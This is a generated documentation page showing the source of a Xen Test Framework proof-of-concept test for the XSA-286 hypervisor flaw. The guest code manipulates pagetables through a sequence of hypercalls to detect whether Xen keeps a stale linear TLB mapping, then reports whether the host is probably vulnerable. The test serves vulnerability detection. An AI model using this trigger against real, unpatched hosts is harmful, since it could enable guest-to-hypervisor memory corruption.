docs/xtf/xsa-286_2main_8c_source.html

#include <xtf.h>


const char test_title[] = "XSA-286 PoC";


static intpte_t l1t1[L1_PT_ENTRIES] __page_aligned_bss;

static intpte_t l1t2[L1_PT_ENTRIES] __page_aligned_bss;

static intpte_t l2t1[L2_PT_ENTRIES] __page_aligned_bss;

static intpte_t l2t2[L2_PT_ENTRIES] __page_aligned_bss;


void test_main(void)

{

    intpte_t *l3t;

    unsigned int slot = 1;

    int rc;


    /* Walk pagetables to L3. */

    if ( IS_DEFINED(CONFIG_64BIT) )

    {

        intpte_t *l4t = _p(pv_start_info->pt_base);


        l3t = maddr_to_virt(pte_to_paddr(l4t[0]));

    }

    else

        l3t = _p(pv_start_info->pt_base);


    /*

     * Prepare l*t*[].  Point each L2[0] at the appropriate L1, and pin the

     * L2's to get all of the type reference handling in Xen out of the way.

     */

    l2t1[0] = pte_from_virt(l1t1, PF_SYM(AD, RW, P));

    l2t2[0] = pte_from_virt(l1t2, PF_SYM(AD, RW, P));


    if ( hypercall_update_va_mapping(

             _u(l1t1), pte_from_virt(l1t1, PF_SYM(AD, P)), 0) )

        return xtf_error("Error: Can't remap l1t1 as R/O\n");

    if ( hypercall_update_va_mapping(

             _u(l1t2), pte_from_virt(l1t2, PF_SYM(AD, P)), 0) )

        return xtf_error("Error: Can't remap l1t2 as R/O\n");

    if ( hypercall_update_va_mapping(

             _u(l2t1), pte_from_virt(l2t1, PF_SYM(AD, P)), 0) )

        return xtf_error("Error: Can't remap l2t1 as R/O\n");

    if ( hypercall_update_va_mapping(

             _u(l2t2), pte_from_virt(l2t2, PF_SYM(AD, P)), 0) )

        return xtf_error("Error: Can't remap l2t2 as R/O\n");


    mmuext_op_t mux[] = {

        {

            .cmd = MMUEXT_PIN_L2_TABLE,

            .arg1.mfn = virt_to_mfn(l2t1),

        },

        {

            .cmd = MMUEXT_PIN_L2_TABLE,

            .arg1.mfn = virt_to_mfn(l2t2),

        },

    };


    rc = hypercall_mmuext_op(mux, ARRAY_SIZE(mux), NULL, DOMID_SELF);

    if ( rc )

        return xtf_error("Error: Can't pin l2t*[]\n");


    /*

     * The test depends on retaining stale TLB mappings to spot the

     * vulnerability.  This can race with interrupt handling and rescheduling.

     * Repeat it several times in quick succession.

     */

    for ( int i = 0; i < 15; ++i )

    {

        /* Reset.  Map l2t1 into l3[slot], clear l1t{1,2}[0]. */

        mmu_update_t mu[] = {

            {

                .ptr = virt_to_maddr(&l3t[slot]),

                .val = pte_from_virt(l2t1, PF_SYM(AD, RW, P)),

            },

            {

                .ptr = virt_to_maddr(&l1t1[0]),

                .val = 0,

            },

            {

                .ptr = virt_to_maddr(&l1t2[0]),

                .val = 0,

            },

        };


        rc = hypercall_mmu_update(mu, ARRAY_SIZE(mu), NULL, DOMID_SELF);

        if ( rc )

            return xtf_error("Error: Can't reset mapping state: %d\n", rc);


        unsigned long addr = slot << L3_PT_SHIFT;


        /*

         * Multicall comprising:

         *

         * - update_va_mapping(addr, 0, INLVPG)

         * - mmu_update(&l3t[slot], l2t2)

         * - update_va_mapping(addr, gfn0 | AD|WR|P, INLVPG)

         */

        mu[0].val = pte_from_virt(l2t2, PF_SYM(AD, RW, P));

        intpte_t nl1e = pte_from_gfn(pfn_to_mfn(0), PF_SYM(AD, RW, P));

        multicall_entry_t multi[] = {

            {

                .op = __HYPERVISOR_update_va_mapping,

                .args = {

                    addr,

                    0,

#ifdef __i386__

                    0,

#endif

                    UVMF_INVLPG,

                },

            },

            {

                .op = __HYPERVISOR_mmu_update,

                .args = {

                    _u(mu),

                    1,

                    _u(NULL),

                    DOMID_SELF,

                },

            },

            {

                .op = __HYPERVISOR_update_va_mapping,

                .args = {

                    addr,

                    (unsigned long)nl1e,

#ifdef __i386__

                    nl1e >> 32,

#endif

                    UVMF_INVLPG,

                },

            },

        };


        rc = hypercall_multicall(multi, ARRAY_SIZE(multi));

        if ( rc )

            return xtf_error("Error: multicall failed: %d\n", rc);


        /*

         * If Xen retained a stale TLB mapping, then l1t1[0] will have been

         * edited, despite l1t2[0] being the correct entry to have editied.

         */

        if ( l1t1[0] )

            return xtf_failure("Fail: Xen retained stale linear pt mapping\n");

    }


    xtf_success("Success: Probably not vulnerable to XSA-286\n");

}


/*

 * Local variables:

 * mode: C

 * c-file-style: "BSD"

 * c-basic-offset: 4

 * tab-width: 4

 * indent-tabs-mode: nil

 * End:

 */

pv_start_info
xen_pv_start_info_t * pv_start_info
Definition: traps.c:14

__page_aligned_bss
#define __page_aligned_bss
Definition: compiler.h:37

test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition: main.c:110

test_title
const char test_title[]
The title of the test.
Definition: main.c:24

hypercall_mmuext_op
static long hypercall_mmuext_op(const mmuext_op_t ops[], unsigned int count, unsigned int *done, unsigned int foreigndom)
Definition: hypercall.h:148

hypercall_multicall
static long hypercall_multicall(struct multicall_entry *list, unsigned int nr)
Definition: hypercall.h:105

hypercall_mmu_update
static long hypercall_mmu_update(const mmu_update_t reqs[], unsigned int count, unsigned int *done, unsigned int foreigndom)
Definition: hypercall.h:60

hypercall_update_va_mapping
static long hypercall_update_va_mapping(unsigned long linear, uint64_t npte, enum XEN_UVMF flags)
Definition: hypercall.h:115

ARRAY_SIZE
#define ARRAY_SIZE(a)
Definition: lib.h:8

IS_DEFINED
#define IS_DEFINED(x)
Evalute whether the CONFIG_ token x is defined.
Definition: macro_magic.h:67

maddr_to_virt
void * maddr_to_virt(uint64_t maddr)

pfn_to_mfn
unsigned long pfn_to_mfn(unsigned long pfn)

virt_to_mfn
unsigned long virt_to_mfn(const void *va)

virt_to_maddr
uint64_t virt_to_maddr(const void *va)

_p
#define _p(v)
Express an abitrary integer v as void *.
Definition: numbers.h:48

_u
#define _u(v)
Express an arbitrary value v as unsigned long.
Definition: numbers.h:53

L2_PT_ENTRIES
#define L2_PT_ENTRIES
Definition: page.h:70

L1_PT_ENTRIES
#define L1_PT_ENTRIES
Definition: page.h:69

intpte_t
unsigned long intpte_t
Definition: page.h:152

pte_from_gfn
intpte_t pte_from_gfn(unsigned long gfn, uint64_t flags)

pte_from_virt
intpte_t pte_from_virt(const void *va, uint64_t flags)

pte_to_paddr
paddr_t pte_to_paddr(intpte_t pte)

xtf_failure
void xtf_failure(const char *fmt,...)
Report a test failure.
Definition: report.c:94

xtf_error
void xtf_error(const char *fmt,...)
Report a test error.
Definition: report.c:80

xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition: report.c:38

NULL
#define NULL
Definition: stddef.h:12

mmu_update
Definition: xen.h:245

mmu_update::val
uint64_t val
Definition: xen.h:250

mmu_update::ptr
uint64_t ptr
Definition: xen.h:249

mmuext_op
Definition: xen.h:355

mmuext_op::cmd
unsigned int cmd
Definition: xen.h:356

multicall_entry
Definition: xen.h:263

multicall_entry::op
unsigned long op
Definition: xen.h:264

xen_pv_start_info::pt_base
unsigned long pt_base
Definition: xen.h:223

PF_SYM
#define PF_SYM(...)
Create pagetable entry flags based on mnemonics.
Definition: symbolic-const.h:108

DOMID_SELF
#define DOMID_SELF
Definition: xen.h:70

__HYPERVISOR_update_va_mapping
#define __HYPERVISOR_update_va_mapping
Definition: xen.h:27

MMUEXT_PIN_L2_TABLE
#define MMUEXT_PIN_L2_TABLE
Definition: xen.h:334

__HYPERVISOR_mmu_update
#define __HYPERVISOR_mmu_update
Definition: xen.h:15

UVMF_INVLPG
@ UVMF_INVLPG
Definition: xen.h:383

multi
static multicall_entry_t multi[]
Definition: main.c:107

l2t1
static intpte_t l2t1[L2_PT_ENTRIES]
Definition: main.c:43

l1t2
static intpte_t l1t2[L1_PT_ENTRIES]
Definition: main.c:42

l1t1
static intpte_t l1t1[L1_PT_ENTRIES]
Definition: main.c:41

l2t2
static intpte_t l2t2[L2_PT_ENTRIES]
Definition: main.c:44